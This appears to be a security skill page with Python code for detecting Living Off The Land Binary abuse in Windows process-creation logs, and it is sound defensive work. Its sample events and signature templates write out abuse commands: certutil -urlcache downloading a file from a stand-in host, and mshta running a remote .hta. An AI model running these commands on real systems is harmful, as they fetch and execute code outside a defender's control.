hunting-living-off-the-land-binaries


Hunting Living Off The Land Binaries

Instructions

Detect LOLBAS abuse by analyzing Windows process creation events (Security Event ID 4688 / Sysmon Event ID 1) and matching their command lines against the abuse patterns catalogued by the LOLBAS project. Note that 4688 only carries a CommandLine field when process command-line auditing is enabled; Sysmon Event ID 1 always includes it.

import requests

# Fetch the LOLBAS database: a JSON list with one entry per binary, script or library
resp = requests.get("https://lolbas-project.github.io/api/lolbas.json", timeout=30)
resp.raise_for_status()
lolbas_db = resp.json()

# Extract each binary's name and the command templates documented for it
for entry in lolbas_db:
    print(entry["Name"], [cmd["Command"] for cmd in entry.get("Commands", [])])
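The snippet above only lists the database. As an added example (not part of the original skill or the LOLBAS project), the code below turns LOLBAS-style entries into matchable signatures and runs constructed 4688 / Sysmon 1 event records through them. The entries and events are hand-written in the same schema as lolbas.json so the example runs offline; the placeholder handling (treating {REMOTEURL} as "argument must be a URL" and {PATH} as "any argument") is an assumption about how to interpret the templates, and the function names are this example's own.

```python
import ntpath
import re

# Constructed LOLBAS-style entries (same Name/Commands[].Command schema as
# lolbas.json, written here by hand so the example runs without network access).
SAMPLE_LOLBAS = [
    {"Name": "Certutil.exe", "Commands": [
        {"Command": "certutil.exe -urlcache -split -f {REMOTEURL} {PATH}",
         "Category": "Download", "MitreID": "T1105"},
        {"Command": "certutil -encode {PATH} {PATH}",
         "Category": "Encode", "MitreID": "T1027"},
    ]},
    {"Name": "Mshta.exe", "Commands": [
        {"Command": "mshta.exe {REMOTEURL}",
         "Category": "Execute", "MitreID": "T1218.005"},
    ]},
]

# Assumption: how a template placeholder constrains a real argument.
PLACEHOLDER_PATTERNS = {
    "REMOTEURL": re.compile(r"^(https?|ftp)://", re.IGNORECASE),
    "PATH": re.compile(r"."),  # any non-empty argument
}
ANY_ARG = re.compile(r".")

_TOKEN_RE = re.compile(r'"[^"]*"|\S+')


def tokenize(cmdline):
    """Split a Windows command line, keeping quoted paths as single tokens."""
    return [t.strip('"') for t in _TOKEN_RE.findall(cmdline)]


def build_signatures(db):
    """Turn each LOLBAS command template into (binary, required flags, placeholders)."""
    sigs = []
    for entry in db:
        for cmd in entry.get("Commands", []):
            tokens = tokenize(cmd["Command"])
            if not tokens:
                continue
            binary = ntpath.basename(tokens[0]).lower()
            if not binary.endswith(".exe"):
                binary += ".exe"
            flags = [t.lower() for t in tokens[1:] if t.startswith(("-", "/"))]
            placeholders = [
                PLACEHOLDER_PATTERNS.get(t.strip("{}").split(":")[0].upper(), ANY_ARG)
                for t in tokens[1:] if t.startswith("{")
            ]
            sigs.append({"binary": binary, "flags": flags, "placeholders": placeholders,
                         "template": cmd["Command"], "category": cmd.get("Category"),
                         "mitre": cmd.get("MitreID")})
    return sigs


def match_event(event, sigs):
    """Return the signatures an event satisfies: same binary, all fixed flags present,
    and every placeholder satisfiable by some non-flag argument."""
    image = event.get("Image") or event.get("NewProcessName") or ""  # Sysmon 1 / 4688
    tokens = tokenize(event.get("CommandLine", ""))
    binary = ntpath.basename(image).lower() or (ntpath.basename(tokens[0]).lower() if tokens else "")
    args = tokens[1:]
    lower_args = [a.lower() for a in args]
    hits = []
    for sig in sigs:
        if sig["binary"] != binary:
            continue
        if not all(f in lower_args for f in sig["flags"]):
            continue
        free_args = [a for a in args if a.lower() not in sig["flags"]]
        if not all(any(p.search(a) for a in free_args) for p in sig["placeholders"]):
            continue
        hits.append(sig)
    return hits


def scan(events, db):
    """Scan a list of process-creation events and return one finding per signature hit."""
    sigs = build_signatures(db)
    findings = []
    for i, ev in enumerate(events):
        for sig in match_event(ev, sigs):
            findings.append({"event": i, "binary": sig["binary"], "category": sig["category"],
                             "mitre": sig["mitre"], "template": sig["template"]})
    return findings


# Constructed sample events: two abuse patterns and two benign uses of the same binaries.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://files.example.invalid/u.txt C:\Users\Public\u.txt"},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r'certutil.exe -hashfile "C:\Program Files\App\app.exe" SHA256'},
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\App\ui.hta"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://cdn.example.invalid/page.hta"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS, SAMPLE_LOLBAS):
        print(f"event {f['event']}: {f['binary']} [{f['category']}/{f['mitre']}] matched {f['template']!r}")
```

Requiring every fixed flag and a plausible argument for each placeholder keeps the benign certutil hash check and the local .hta launch from firing, while the download and remote-HTA cases both match; in production the same signature set would be built from the fetched lolbas.json and the matcher pointed at a SIEM export of 4688 / Sysmon 1 records.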
Installs: 2
GitHub Stars: 6.3K
First Seen: Mar 17, 2026